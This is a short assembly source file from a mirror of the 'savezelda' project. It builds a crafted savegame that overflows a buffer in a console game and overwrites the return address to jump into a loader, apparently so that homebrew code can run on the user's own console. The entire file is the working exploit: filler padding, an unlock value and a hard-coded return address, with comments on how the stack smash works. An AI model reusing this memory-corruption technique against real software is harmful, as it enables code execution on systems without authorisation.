mirror of
https://github.com/lewurm/savezelda.git
synced 2024-11-17 16:19:21 +01:00
32 lines
1001 B
ArmAsm
32 lines
1001 B
ArmAsm
|
# Copyright 2011 Bernhard Urban <lewurm@gmail.com>
|
||
|
# This code is licensed to you under the terms of the GNU GPL, version 2;
|
||
|
# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
|
||
|
|
||
|
retadr = 0x90394140
|
||
|
0:
|
||
|
# stolen from some savegame found in teh intertube
|
||
|
.incbin "head.b"
|
||
|
|
||
|
# give the char a name
|
||
|
.ascii "you won't see this " # len = 0x14
|
||
|
|
||
|
# smash it \o/ 0x1f0+0x4 bytes all in all...
|
||
|
.fill (0xf4/4), 4, 0x11111111
|
||
|
|
||
|
# unlock the character (somewhere here actually...)
|
||
|
.fill (0x10/4), 4, 0x90c10104
|
||
|
|
||
|
# add more padding...
|
||
|
.fill (0xdc/4), 4, 0x11111111
|
||
|
|
||
|
# now we at the actual vuln return address
|
||
|
# just point to the loader of the loader (= content of exploit.s)
|
||
|
.long retadr
|
||
|
|
||
|
# alternatively you can put the code here too and jump into the stack,
|
||
|
# however then you have to take care for nullbytes in the resulting
|
||
|
# bytecode, which is a way too tedious. so we just take the further slot for
|
||
|
# it :-) (LEGO devs are nice ppl, heh)
|
||
|
|
||
|
.fill 0x10000 - (. - 0b)
|